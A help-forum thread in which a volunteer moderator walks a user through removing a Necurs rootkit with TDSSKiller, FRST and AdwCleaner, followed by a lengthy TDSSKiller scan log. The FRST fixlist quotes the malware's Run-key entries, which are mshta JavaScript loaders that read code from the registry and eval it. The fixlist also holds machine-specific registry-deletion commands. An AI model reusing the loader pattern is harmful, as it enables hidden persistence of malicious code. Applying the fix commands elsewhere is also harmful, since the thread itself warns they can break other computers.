Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

Unable to run any antivirus or malware removal tool. [Solved]


  • This topic is locked This topic is locked

#1
Joe Hunter

Joe Hunter

    New Member

  • Member
  • Pip
  • 9 posts
Hello, I'm pretty certain I have some malware or adware on my pc blocking the ability to scan amongst other things. Sometimes upon turning my pc off it will flash up multiple adverts that were seemingly running behind the scenes which is weird.
Any help with this would be greatly appreciated as (rather ironically) I'm currently writing my Dissertation on cloud computing security!
Thanks in advance.
  • 0

Advertisements


#2
Joe Hunter

Joe Hunter

    New Member

  • Topic Starter
  • Member
  • Pip
  • 9 posts

Having read through some other threads i've run the Farbar Recovery tool and these are the logs.

Attached Files


Edited by Joe Hunter, 28 March 2016 - 01:07 PM.

  • 0

#3
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
Hi you have a Necurs rootkit so we will need to run several programmes to kill it

Download the latest version of TDSSKiller from here and save it to your Desktop.
  • Doubleclick on TDSSKiller.exe to run the application
    tdss%20start.JPG
  • Then click on Change parameters.

    tdss%20Change%20param.JPG
  • Check the boxes beside Verify Driver Digital Signature, Detect TDLFS file system and Use KSN to scan objects , then click OK.
  • Click the Start Scan button.
  • If a suspicious object is detected, the default action will be Skip, click on Continue.

    tdss%20threat.JPG
  • If malicious objects are found, they will show in the Scan results and offer three (3) options.
  • Ensure Cure is selected, then click Continue => Reboot now to finish the cleaning process.
  • Get the report by selecting Reports

    tdss%20report.JPG
  • Note: If Cure is not available, please choose Skip instead, do not choose Delete unless instructed.
Please copy and paste its contents on your next reply.

THEN

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:
 

CreateRestorePoint:
HKLM-x32\...\Run: [**eeb9c5dc<*>] => mshta javascript:VyIZ9J1V="VOf";Z2V8=new%20ActiveXObject("WScript.Shell");uJ45fzMWmA="Fe";GAj7Y=Z2V8.RegRead("HKLM\\software\\Wow6432Node\\e09000bd53\\76676c3b");nk0ceuWpp="XRl";eval(GAj7Y);tgL5ndl="H (the data entry has 5 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Policies\Explorer\Run: [**552f49b9<*>] => mshta javascript:mdDO90BSHt="Av";tr69=new%20ActiveXObject("WScript.Shell");Khb1nGB="LpdnVipZK3";AR2lR=tr69.RegRead("HKLM\\software\\Wow6432Node\\e09000bd53\\76676c3b");nubGY1N6K="1JadTvk";eval(AR2lR); (the data entry has 20 more characters). <===== ATTENTION (Value Name with invalid characters)
Toolbar: HKU\S-1-5-21-3655023002-2648474569-3043735959-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
CHR Extension: (GGoSauve) - C:\Users\Joe\AppData\Local\Google\Chrome\User Data\Default\Extensions\jlabfejiidahciobclpfigdfpgfbedee [2014-09-25]
CHR HKLM\...\Chrome\Extension: [pflphaooapbgpeakohlggbpidpppgdff] - C:\Users\Joe\AppData\Local\mysearchdial-speeddial.crx <not found>
CHR HKU\S-1-5-21-3655023002-2648474569-3043735959-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pflphaooapbgpeakohlggbpidpppgdff] - C:\Users\Joe\AppData\Local\mysearchdial-speeddial.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [debmkdhphjfcbaomiknnceliiclnpmfg] - C:\Program Files (x86)\Jump Flip\debmkdhphjfcbaomiknnceliiclnpmfg.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [pflphaooapbgpeakohlggbpidpppgdff] - C:\Users\Joe\AppData\Local\mysearchdial-speeddial.crx <not found>
R2 syshost32; C:\Windows\Installer\{673C08DA-2B79-E036-1E40-630AFC5BA90F}\syshost.exe [215477 2015-12-22] () [File not signed]
2016-03-28 16:53 - 2014-09-25 20:28 - 00000000 ____D C:\ProgramData\4675a9632c473f58
Task: {46CF61D3-A536-490F-A3A3-5C1787480CBC} - System32\Tasks\UpdaterEX => C:\Users\Joe\AppData\Roaming\UpdaterEX\UpdateProc\UpdateTask.exe [2013-04-12] () <==== ATTENTION
C:\Users\Joe\AppData\Roaming\UpdaterEX
Task: C:\Windows\Tasks\UpdaterEX.job => C:\Users\Joe\AppData\Roaming\UPDATE~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
C:\Windows\Installer\{673C08DA-2B79-E036-1E40-630AFC5BA90F}
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg delete HKLM\software\Wow6432Node\e09000bd53
cmd: sfc /scanfile=C:\Windows\system32\Drivers\volsnap.sys
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers


Save this as fixlist.txt, in the same location as FRST.exe
FRSTfix.JPG
Run FRST and press Fix
On completion a log will be generated please post that

FINALLY

Please download AdwCleaner by Xplode onto your desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click on Scan.
  • After the scan is complete click on "Clean"
  • Confirm each time with Ok.
  • Your computer will be rebooted automatically. A text file will open after the restart.
  • Please post the content of that logfile with your next answer.
  • You can find the logfile at C:\AdwCleaner[S0].txt as well.

  • 0

#4
Joe Hunter

Joe Hunter

    New Member

  • Topic Starter
  • Member
  • Pip
  • 9 posts

Report from TDSS Killer:

 

23:20:10.0290 0x0bf8  TDSS rootkit removing tool 3.1.0.9 Dec 11 2015 22:49:12
23:20:10.0820 0x0bf8  ============================================================
23:20:10.0820 0x0bf8  Current date / time: 2016/03/28 23:20:10.0820
23:20:10.0820 0x0bf8  SystemInfo:
23:20:10.0820 0x0bf8  
23:20:10.0820 0x0bf8  OS Version: 6.1.7600 ServicePack: 0.0
23:20:10.0820 0x0bf8  Product type: Workstation
23:20:10.0820 0x0bf8  ComputerName: JOE-PC
23:20:10.0820 0x0bf8  UserName: Joe
23:20:10.0820 0x0bf8  Windows directory: C:\Windows
23:20:10.0820 0x0bf8  System windows directory: C:\Windows
23:20:10.0820 0x0bf8  Running under WOW64
23:20:10.0820 0x0bf8  Processor architecture: Intel x64
23:20:10.0820 0x0bf8  Number of processors: 4
23:20:10.0820 0x0bf8  Page size: 0x1000
23:20:10.0820 0x0bf8  Boot type: Normal boot
23:20:10.0820 0x0bf8  ============================================================
23:20:10.0820 0x0bf8  BG loaded
23:20:11.0397 0x0bf8  System UUID: {542E727D-0E9B-4809-6531-7CC05B5788E1}
23:20:12.0099 0x0bf8  Drive \Device\Harddisk0\DR0 - Size: 0xE8E0DB6000 ( 931.51 Gb ), SectorSize: 0x200, Cylinders: 0x1DB01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
23:20:12.0115 0x0bf8  ============================================================
23:20:12.0115 0x0bf8  \Device\Harddisk0\DR0:
23:20:12.0115 0x0bf8  MBR partitions:
23:20:12.0115 0x0bf8  \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x32000
23:20:12.0115 0x0bf8  \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x32800, BlocksNum 0x746D3800
23:20:12.0115 0x0bf8  ============================================================
23:20:12.0240 0x0bf8  C: <-> \Device\Harddisk0\DR0\Partition2
23:20:12.0240 0x0bf8  ============================================================
23:20:12.0240 0x0bf8  Initialize success
23:20:12.0240 0x0bf8  ============================================================
23:22:33.0347 0x18fc  ============================================================
23:22:33.0347 0x18fc  Scan started
23:22:33.0347 0x18fc  Mode: Manual; SigCheck; TDLFS; 
23:22:33.0347 0x18fc  ============================================================
23:22:33.0347 0x18fc  KSN ping started
23:22:51.0445 0x18fc  KSN ping finished: true
23:23:09.0594 0x18fc  ================ Scan system memory ========================
23:23:09.0594 0x18fc  System memory - ok
23:23:09.0594 0x18fc  ================ Scan services =============================
23:23:11.0776 0x18fc  [ 1B00662092F9F9568B995902F0CC40D5, D345014CF146FA57B2682C189D5E7F27D4C78F321F2723D912D623E777C2BB70 ] 1394ohci        C:\Windows\system32\DRIVERS\1394ohci.sys
23:23:11.0990 0x18fc  1394ohci - ok
23:23:12.0002 0x18fc  Suspicious service (NoAccess): 8299bf85dcfa9606
23:23:12.0092 0x18fc  [ 53F4E0D13D91B24B1DE4C88EFF15EA63, F21662D344847EAC227E213CD142F946528629C8CDD271F86EE245AAA6CD6305 ] 8299bf85dcfa9606 C:\Windows\System32\Drivers\8299bf85dcfa9606.sys
23:23:12.0092 0x18fc  Suspicious file ( NoAccess ): C:\Windows\System32\Drivers\8299bf85dcfa9606.sys. md5: 53F4E0D13D91B24B1DE4C88EFF15EA63, sha256: F21662D344847EAC227E213CD142F946528629C8CDD271F86EE245AAA6CD6305
23:23:12.0166 0x18fc  8299bf85dcfa9606 - detected Rootkit.Win32.Necurs.gen ( 0 )
23:23:15.0765 0x18fc  Object required for P2P: [ 53F4E0D13D91B24B1DE4C88EFF15EA63 ] 8299bf85dcfa9606
23:23:28.0368 0x18fc  Object send P2P result: true
23:23:28.0458 0x18fc  8299bf85dcfa9606 ( Rootkit.Win32.Necurs.gen ) - infected
23:23:28.0458 0x18fc  Force sending object to P2P due to detect: 8299bf85dcfa9606
23:23:28.0458 0x18fc  Object send P2P result: false
23:23:28.0568 0x18fc  [ 6F11E88748CDEFD2F76AA215F97DDFE5, BD0B3561EDCDE5EFD89372793CFD09DF879709BF469542F4A049705CBA9FD060 ] ACPI            C:\Windows\system32\DRIVERS\ACPI.sys
23:23:28.0628 0x18fc  ACPI - ok
23:23:28.0708 0x18fc  [ 63B05A0420CE4BF0E4AF6DCC7CADA254, 56BCC219D6B886FD42B7D335B4A7BBA3C9BC148220CBD99F8583FB505DAE63BF ] AcpiPmi         C:\Windows\system32\DRIVERS\acpipmi.sys
23:23:28.0888 0x18fc  AcpiPmi - ok
23:23:31.0298 0x18fc  [ 280A526E8111AC6A5BCC1A059E1E0340, FB92DDAE29A097D148AB23D8A0BD2B9E662EC1DBF0DA8B716374D6919B4C646F ] AdobeFlashPlayerUpdateSvc C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
23:23:31.0338 0x18fc  AdobeFlashPlayerUpdateSvc - ok
23:23:31.0388 0x18fc  [ 2F6B34B83843F0C5118B63AC634F5BF4, 43E3F5FBFB5D33981AC503DEE476868EC029815D459E7C36C4ABC2D2F75B5735 ] adp94xx         C:\Windows\system32\DRIVERS\adp94xx.sys
23:23:31.0398 0x18fc  adp94xx - ok
23:23:31.0468 0x18fc  [ 597F78224EE9224EA1A13D6350CED962, DA7FD99BE5E3B7B98605BF5C13BF3F1A286C0DE1240617570B46FE4605E59BDC ] adpahci         C:\Windows\system32\DRIVERS\adpahci.sys
23:23:31.0488 0x18fc  adpahci - ok
23:23:31.0498 0x18fc  [ E109549C90F62FB570B9540C4B148E54, E804563735153EA00A00641814244BC8A347B578E7D63A16F43FB17566EE5559 ] adpu320         C:\Windows\system32\DRIVERS\adpu320.sys
23:23:31.0508 0x18fc  adpu320 - ok
23:23:31.0588 0x18fc  [ 4B78B431F225FD8624C5655CB1DE7B61, 198A5AF2125C7C41F531A652D200C083A55A97DC541E3C0B5B253C7329949156 ] AeLookupSvc     C:\Windows\System32\aelupsvc.dll
23:23:32.0708 0x18fc  AeLookupSvc - ok
23:23:32.0778 0x18fc  [ B9384E03479D2506BC924C16A3DB87BC, AB5FD2BC1F005E7D664F5DE3D5CB54499024A83B716DD52C56582DB7EFB4F01B ] AFD             C:\Windows\system32\drivers\afd.sys
23:23:32.0818 0x18fc  AFD - ok
23:23:32.0928 0x18fc  [ 608C14DBA7299D8CB6ED035A68A15799, 45360F89640BF1127C82A32393BD76205E4FA067889C40C491602F370C09282A ] agp440          C:\Windows\system32\DRIVERS\agp440.sys
23:23:32.0938 0x18fc  agp440 - ok
23:23:32.0978 0x18fc  [ 3290D6946B5E30E70414990574883DDB, 0E9294E1991572256B3CDA6B031DB9F39CA601385515EE59F1F601725B889663 ] ALG             C:\Windows\System32\alg.exe
23:23:32.0998 0x18fc  ALG - ok
23:23:33.0088 0x18fc  [ 5812713A477A3AD7363C7438CA2EE038, A7316299470D2E57A11499C752A711BF4A71EB11C9CBA731ED0945FF6A966721 ] aliide          C:\Windows\system32\DRIVERS\aliide.sys
23:23:33.0098 0x18fc  aliide - ok
23:23:33.0188 0x18fc  [ F9B4B5E545E4B8B3EAFD6ADB6417B67D, 0F07BEAE04A25A059DFEB3A510B7CD45B70C36648643CEE129320AE949971ADA ] AMD External Events Utility C:\Windows\system32\atiesrxx.exe
23:23:33.0288 0x18fc  AMD External Events Utility - ok
23:23:33.0378 0x18fc  AMD FUEL Service - ok
23:23:33.0408 0x18fc  [ 05120427227F6F088ECA75942ED7ACA9, BD25436EB43C6718F5E6A4C3C24831189D3A893DC87AA0ADED993B7C3126F2E9 ] amdhub30        C:\Windows\system32\DRIVERS\amdhub30.sys
23:23:33.0408 0x18fc  amdhub30 - ok
23:23:33.0478 0x18fc  [ 1FF8B4431C353CE385C875F194924C0C, 3EA3A7F426B0FFC2461EDF4FDB4B58ACC9D0730EDA5B728D1EA1346EA0A02720 ] amdide          C:\Windows\system32\DRIVERS\amdide.sys
23:23:33.0478 0x18fc  amdide - ok
23:23:33.0508 0x18fc  [ 7024F087CFF1833A806193EF9D22CDA9, E7F27E488C38338388103D3B7EEDD61D05E14FB140992AEE6F492FFC821BF529 ] AmdK8           C:\Windows\system32\DRIVERS\amdk8.sys
23:23:33.0588 0x18fc  AmdK8 - ok
23:23:34.0460 0x18fc  [ AA5E8F39880046443E57B646F24840F3, CC0DAA6E8B9C940294971F7B549AE7546B8C2D1A522BE043CBAEF6E127166F63 ] amdkmdag        C:\Windows\system32\DRIVERS\atikmdag.sys
23:23:35.0032 0x18fc  amdkmdag - ok
23:23:35.0242 0x18fc  [ EFA2AC1F4BB4618CDD6B00DDE8035942, B1F91C2B76676E4EA8E0CC007A2591CDF6888E38D60C337D17C3080DE9C5EE16 ] amdkmdap        C:\Windows\system32\DRIVERS\atikmpag.sys
23:23:35.0322 0x18fc  amdkmdap - ok
23:23:35.0382 0x18fc  [ 1E56388B3FE0D031C44144EB8C4D6217, E88CA76FD47BA0EB427D59CB9BE040DE133D89D4E62D03A8D622624531D27487 ] AmdPPM          C:\Windows\system32\DRIVERS\amdppm.sys
23:23:35.0491 0x18fc  AmdPPM - ok
23:23:35.0624 0x18fc  [ 7A4B413614C055935567CF88A9734D38, A3BB7CDF3EE0EEF67F89263E81145E73C7142EF5F0AF265375C2ECCE74F932C4 ] amdsata         C:\Windows\system32\DRIVERS\amdsata.sys
23:23:35.0634 0x18fc  amdsata - ok
23:23:35.0704 0x18fc  [ F67F933E79241ED32FF46A4F29B5120B, D6EF539058F159CC4DD14CA9B1FD924998FEAC9D325C823C7A2DD21FEF1DC1A8 ] amdsbs          C:\Windows\system32\DRIVERS\amdsbs.sys
23:23:35.0714 0x18fc  amdsbs - ok
23:23:35.0765 0x18fc  [ B4AD0CACBAB298671DD6F6EF7E20679D, FB566C892D0A3DC0A523AE20F35011996958D670937DD5C1A1FCCD36AAC714D7 ] amdxata         C:\Windows\system32\DRIVERS\amdxata.sys
23:23:35.0771 0x18fc  amdxata - ok
23:23:35.0806 0x18fc  [ 7DCA2C59491D420947A0B529DB37C7CF, 4673DD141F02801A61FF057BE9DA7FD214C1F9ED31BCB035A8C4E44C579799E4 ] amdxhc          C:\Windows\system32\DRIVERS\amdxhc.sys
23:23:35.0816 0x18fc  amdxhc - ok
23:23:35.0916 0x18fc  [ 10378ADFA7F832B68616C3B8C6470DBB, 4738F81C40BF3B75612E983AC0DADCA8B4A7D3A5B3FBB5058B93D421A32979AC ] AODDriver4.3    C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys
23:23:35.0926 0x18fc  AODDriver4.3 - ok
23:23:35.0966 0x18fc  [ 42FD751B27FA0E9C69BB39F39E409594, DE349CAA570957868CA1CB0BE0FAF551CD4D44FD53EBC4391B9C1C7B9CF295D2 ] AppID           C:\Windows\system32\drivers\appid.sys
23:23:36.0316 0x18fc  AppID - ok
23:23:36.0386 0x18fc  [ 0BC381A15355A3982216F7172F545DE1, C33AF13CB218F7BF52E967452573DF2ADD20A95C6BF99229794FEF07C4BBE725 ] AppIDSvc        C:\Windows\System32\appidsvc.dll
23:23:36.0456 0x18fc  AppIDSvc - ok
23:23:36.0496 0x18fc  [ D065BE66822847B7F127D1F90158376E, 20F911F390FF23C2C42361A449C4344DB59F1DC21EDD1E7EBC4E80914DEF7824 ] Appinfo         C:\Windows\System32\appinfo.dll
23:23:36.0536 0x18fc  Appinfo - ok
23:23:36.0806 0x18fc  [ 612CB66D93ED0F2F21BB109840C7D813, 75484123DA27B8942B13148FCF061C75A08A50386A095143736B593E9C772173 ] Apple Mobile Device Service C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
23:23:36.0816 0x18fc  Apple Mobile Device Service - ok
23:23:36.0866 0x18fc  [ C484F8CEB1717C540242531DB7845C4E, C507CE26716EB923B864ED85E8FA0B24591E2784A2F4F0E78AEED7E9953311F6 ] arc             C:\Windows\system32\DRIVERS\arc.sys
23:23:36.0876 0x18fc  arc - ok
23:23:36.0896 0x18fc  [ 019AF6924AEFE7839F61C830227FE79C, 5926B9DDFC9198043CDD6EA0B384C83B001EC225A8125628C4A45A3E6C42C72A ] arcsas          C:\Windows\system32\DRIVERS\arcsas.sys
23:23:36.0946 0x18fc  arcsas - ok
23:23:37.0626 0x18fc  [ 041672BAC20B34EAEDEB033129655DD8, 14264732F0CACF5732C7652C411F0A1C3B4A4417C31DD289C8AFF170BE683E5A ] aspnet_state    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
23:23:37.0776 0x18fc  aspnet_state - ok
23:23:37.0826 0x18fc  [ E1AFEE1584C74050DE0DD16DE2A54BF3, 77C8D98159D8BCDC7917B04977949823D50C49D0D13587310E060A4B8893AE42 ] AsrAppCharger   C:\Windows\system32\DRIVERS\AsrAppCharger.sys
23:23:37.0836 0x18fc  AsrAppCharger - ok
23:23:38.0038 0x18fc  [ D208B82330EB0CA9E1285520630183F1, 1122E08493BFDF639ECB80A7F3BD640971FF3639154F4130434F98E1831E004A ] ASRockIOMon     C:\Program Files (x86)\ASRock Utility\A-Tuning\Bin\IOMonitorSrv.exe
23:23:38.0058 0x18fc  ASRockIOMon - detected UnsignedFile.Multi.Generic ( 1 )
23:23:38.0058 0x18fc  ASRockIOMon ( UnsignedFile.Multi.Generic ) - warning
23:23:38.0128 0x18fc  [ A149C93231945A5118C63AEACA6D1E72, 60B28184585B389751FCF71651A139D74018DE04AEBF4A497835AF727B64BD53 ] AsrRamDisk      C:\Windows\system32\DRIVERS\AsrRamDisk.sys
23:23:38.0128 0x18fc  AsrRamDisk - ok
23:23:38.0178 0x18fc  [ 7E66DFE6B62C6C34FD6B09DB6169E9F6, BCE908BBF35FD9471018BFC9DCE357529F558693692FF51DA868024F7FD0E868 ] aswHwid         C:\Windows\system32\drivers\aswHwid.sys
23:23:38.0188 0x18fc  aswHwid - ok
23:23:38.0238 0x18fc  [ 1459AAD5C6A66A458C2D57EE6E080FA5, 6A3D6EBCE1EDCFE307DF915CB0C3183668848BCEAA71EA58AB0F4F650F8EABDA ] aswMonFlt       C:\Windows\system32\drivers\aswMonFlt.sys
23:23:38.0248 0x18fc  aswMonFlt - ok
23:23:38.0338 0x18fc  [ 0866D5FE02D614501B7B4AD5E1BC7B53, C34B4AF64DA9592EADC070C7A384070D564DCE3412337F671932A4818D8E12E8 ] aswRdr          C:\Windows\system32\drivers\aswRdr2.sys
23:23:38.0338 0x18fc  aswRdr - ok
23:23:38.0408 0x18fc  [ 0AA12ADF5F87B4A70BDBAED77F54B978, 2C33F656EC2E51493A40FF32A5C934E209CF1475A8B0F3573396E97F8A10A76A ] aswRvrt         C:\Windows\system32\drivers\aswRvrt.sys
23:23:38.0418 0x18fc  aswRvrt - ok
23:23:38.0588 0x18fc  [ 719B704109B933D819093CDDB156A7F1, 3FF75BFA8BBE5C4A817C8166BAD73B1E3C5609D6A1F0AE85B166E30DE61EB901 ] aswSnx          C:\Windows\system32\drivers\aswSnx.sys
23:23:38.0623 0x18fc  aswSnx - ok
23:23:38.0750 0x18fc  [ 43F46E7D103F46EC345B1056BDD2A60B, 6F8D844F3EBFDC56A319758C88B2C87FBDE185E5B1E08F8627F29158F190DBFF ] aswSP           C:\Windows\system32\drivers\aswSP.sys
23:23:38.0770 0x18fc  aswSP - ok
23:23:38.0832 0x18fc  [ 219D0E2348629FAE4E6E3478C21B23D6, 3545F59A966F31CE949596629217FD4D7119162411073D4D811575620728AC68 ] aswStm          C:\Windows\system32\drivers\aswStm.sys
23:23:38.0842 0x18fc  aswStm - ok
23:23:38.0962 0x18fc  [ 9949BBD5BB70C4D317B7549896132579, DD92AAD8530C04365C24BD540C909FBDCFC92B18CB6ABB0E655F360EBC4DCD1E ] aswVmm          C:\Windows\system32\drivers\aswVmm.sys
23:23:39.0052 0x18fc  aswVmm - ok
23:23:39.0102 0x18fc  [ 769765CE2CC62867468CEA93969B2242, 0D8F19D49869DF93A3876B4C2E249D12E83F9CE11DAE8917D368E292043D4D26 ] AsyncMac        C:\Windows\system32\DRIVERS\asyncmac.sys
23:23:39.0182 0x18fc  AsyncMac - ok
23:23:39.0212 0x18fc  [ 02062C0B390B7729EDC9E69C680A6F3C, 0261683C6DC2706DCE491A1CDC954AC9C9E649376EC30760BB4E225E18DC5273 ] atapi           C:\Windows\system32\DRIVERS\atapi.sys
23:23:39.0222 0x18fc  atapi - ok
23:23:39.0302 0x18fc  [ C22D4905DDDF73EB0349D3B0604234A2, F86220290663FA95F3D8181D41F9D105634A62D50856BCEB174B9675F8DD7669 ] AtiHDAudioService C:\Windows\system32\drivers\AtihdW76.sys
23:23:39.0332 0x18fc  AtiHDAudioService - ok
23:23:39.0372 0x18fc  [ 07721A77180EDD4D39CCB865BF63C7FD, 9E8117E747C86154F98F2686D805A981029CC5D11AFB115A529429C9A4579BE5 ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll
23:23:39.0442 0x18fc  AudioEndpointBuilder - ok
23:23:39.0462 0x18fc  [ 07721A77180EDD4D39CCB865BF63C7FD, 9E8117E747C86154F98F2686D805A981029CC5D11AFB115A529429C9A4579BE5 ] AudioSrv        C:\Windows\System32\Audiosrv.dll
23:23:39.0512 0x18fc  AudioSrv - ok
23:23:39.0822 0x18fc  [ 501E11AE85EE28D305D228F5931AC76C, FB7052CFA143E5D431131EBB59D4EDAEEFCB56A017552E2395F1954F861613A0 ] avast! Antivirus C:\Program Files\AVAST Software\Avast\AvastSvc.exe
23:23:39.0852 0x18fc  avast! Antivirus - ok
23:23:39.0922 0x18fc  [ B20B5FA5CA050E9926E4D1DB81501B32, 91B9038349BA07E32DE809E6798167EE44087809EB1174B84EC16580040F1BE0 ] AxInstSV        C:\Windows\System32\AxInstSV.dll
23:23:40.0022 0x18fc  AxInstSV - ok
23:23:40.0062 0x18fc  [ 3E5B191307609F7514148C6832BB0842, DE011CB7AA4A2405FAF21575182E0793A1D83DFFC44E9A7864D59F3D51D8D580 ] b06bdrv         C:\Windows\system32\DRIVERS\bxvbda.sys
23:23:40.0112 0x18fc  b06bdrv - ok
23:23:40.0152 0x18fc  [ B5ACE6968304A3900EEB1EBFD9622DF2, 1DAA118D8CA3F97B34DF3D3CDA1C78EAB2ED225699FEABE89D331AE0CB7679FA ] b57nd60a        C:\Windows\system32\DRIVERS\b57nd60a.sys
23:23:40.0182 0x18fc  b57nd60a - ok
23:23:40.0432 0x18fc  [ 6FA3557EA5FA09BA705298CC6B0E9F5A, 3C8EA2080973619DEC613FC2F2022AA1A931EE9640C32C6DF6B50C46671BE5F5 ] BCMH43XX        C:\Windows\system32\DRIVERS\bcmwlhigh664.sys
23:23:40.0462 0x18fc  BCMH43XX - ok
23:23:40.0512 0x18fc  [ FDE360167101B4E45A96F939F388AEB0, 8D1457E866BBD645C4B9710DFBFF93405CC1193BF9AE42326F2382500B713B82 ] BDESVC          C:\Windows\System32\bdesvc.dll
23:23:40.0562 0x18fc  BDESVC - ok
23:23:40.0602 0x18fc  [ 16A47CE2DECC9B099349A5F840654746, 77C008AEDB07FAC66413841D65C952DDB56FE7DCA5E9EF9C8F4130336B838024 ] Beep            C:\Windows\system32\drivers\Beep.sys
23:23:40.0652 0x18fc  Beep - ok
23:23:40.0794 0x18fc  [ 4992C609A6315671463E30F6512BC022, 3020034556EAC25CD90F41D3BFFDD0BB2C3D1C5BAC4359F4B71B84A9FC404495 ] BFE             C:\Windows\System32\bfe.dll
23:23:40.0874 0x18fc  BFE - ok
23:23:41.0084 0x18fc  [ 7F0C323FE3DA28AA4AA1BDA3F575707F, 7FF09CBC16A9E5F357A76FF79A3F0DD047957D474031F51A6BB4916C7911F005 ] BITS            C:\Windows\System32\qmgr.dll
23:23:41.0256 0x18fc  BITS - ok
23:23:41.0316 0x18fc  [ 61583EE3C3A17003C4ACD0475646B4D3, 17E4BECC309C450E7E44F59A9C0BBC24D21BDC66DFBA65B8F198A00BB47A9811 ] blbdrive        C:\Windows\system32\DRIVERS\blbdrive.sys
23:23:41.0326 0x18fc  blbdrive - ok
23:23:41.0496 0x18fc  [ EBBCD5DFBB1DE70E8F4AF8FA59E401FD, 17BFFC5DF609CE3B2F0CAB4BD6C118608C66A3AD86116A47E90B2BB7D8954122 ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
23:23:41.0516 0x18fc  Bonjour Service - ok
23:23:41.0536 0x18fc  [ 91CE0D3DC57DD377E690A2D324022B08, 61874463956C0BCA5139522F34E974E5F638A092E0FD5C59DD30DE61D9AB8B0E ] bowser          C:\Windows\system32\DRIVERS\bowser.sys
23:23:41.0576 0x18fc  bowser - ok
23:23:41.0606 0x18fc  [ F09EEE9EDC320B5E1501F749FDE686C8, 66691114C42E12F4CC6DC4078D4D2FA4029759ACDAF1B59D17383487180E84E3 ] BrFiltLo        C:\Windows\system32\DRIVERS\BrFiltLo.sys
23:23:41.0616 0x18fc  BrFiltLo - ok
23:23:41.0626 0x18fc  [ B114D3098E9BDB8BEA8B053685831BE6, 0ED23C1897F35FA00B9C2848DE4ED200E18688AA7825674888054BBC3A3EB92C ] BrFiltUp        C:\Windows\system32\DRIVERS\BrFiltUp.sys
23:23:41.0646 0x18fc  BrFiltUp - ok
23:23:41.0706 0x18fc  [ 94FBC06F294D58D02361918418F996E3, 62C7CC2AF8F5A0BB0C262DACDE3F72C6AC318C3840CE60E46EE2064B32BDA5EF ] Browser         C:\Windows\System32\browser.dll
23:23:41.0746 0x18fc  Browser - ok
23:23:41.0766 0x18fc  [ 43BEA8D483BF1870F018E2D02E06A5BD, 4E6F5A5FD8C796A110B0DC9FF29E31EA78C04518FC1C840EF61BABD58AB10272 ] Brserid         C:\Windows\System32\Drivers\Brserid.sys
23:23:41.0836 0x18fc  Brserid - ok
23:23:41.0856 0x18fc  [ A6ECA2151B08A09CACECA35C07F05B42, E2875BB7768ABAF38C3377007AA0A3C281503474D1831E396FB6599721586B0C ] BrSerWdm        C:\Windows\System32\Drivers\BrSerWdm.sys
23:23:41.0876 0x18fc  BrSerWdm - ok
23:23:41.0896 0x18fc  [ B79968002C277E869CF38BD22CD61524, 50631836502237AF4893ECDCEA43B9031C3DE97433F594D46AF7C3C77F331983 ] BrUsbMdm        C:\Windows\System32\Drivers\BrUsbMdm.sys
23:23:41.0936 0x18fc  BrUsbMdm - ok
23:23:41.0936 0x18fc  [ A87528880231C54E75EA7A44943B38BF, 4C8BBB29FDA76A96840AA47A8613C15D4466F9273A13941C19507008629709C9 ] BrUsbSer        C:\Windows\System32\Drivers\BrUsbSer.sys
23:23:41.0946 0x18fc  BrUsbSer - ok
23:23:41.0966 0x18fc  [ 9DA669F11D1F894AB4EB69BF546A42E8, B498B8B6CEF957B73179D1ADAF084BBB57BB3735D810F9BE2C7B1D58A4FD25A4 ] BTHMODEM        C:\Windows\system32\DRIVERS\bthmodem.sys
23:23:41.0986 0x18fc  BTHMODEM - ok
23:23:41.0996 0x18fc  [ 95F9C2976059462CBBF227F7AAB10DE9, 2797AE919FF7606B070FB039CECDB0707CD2131DCAC09C5DF14F443D881C9F34 ] bthserv         C:\Windows\system32\bthserv.dll
23:23:42.0036 0x18fc  bthserv - ok
23:23:42.0148 0x18fc  [ EC64C9C431FF641938E3217162934CD9, C26C1538BE6633F30E2AC75632F35A231439520C2D6E00695561676E4334AC84 ] BT_WPS_Service  C:\Program Files\British Telecom\British Telecom 802.11 Network Adapter\Driver\CppWindowsService.exe
23:23:42.0168 0x18fc  BT_WPS_Service - detected UnsignedFile.Multi.Generic ( 1 )
23:23:42.0168 0x18fc  BT_WPS_Service ( UnsignedFile.Multi.Generic ) - warning
23:23:42.0198 0x18fc  [ B8BD2BB284668C84865658C77574381A, 6C55BA288B626DF172FDFEA0BD7027FAEBA1F44EF20AB55160D7C7DC6E717D65 ] cdfs            C:\Windows\system32\DRIVERS\cdfs.sys
23:23:42.0228 0x18fc  cdfs - ok
23:23:42.0288 0x18fc  [ 83D2D75E1EFB81B3450C18131443F7DB, F2C686C980D818E797818E75B808E1E0B51B2045840A4BFC32D860B7DB4DFA22 ] cdrom           C:\Windows\system32\DRIVERS\cdrom.sys
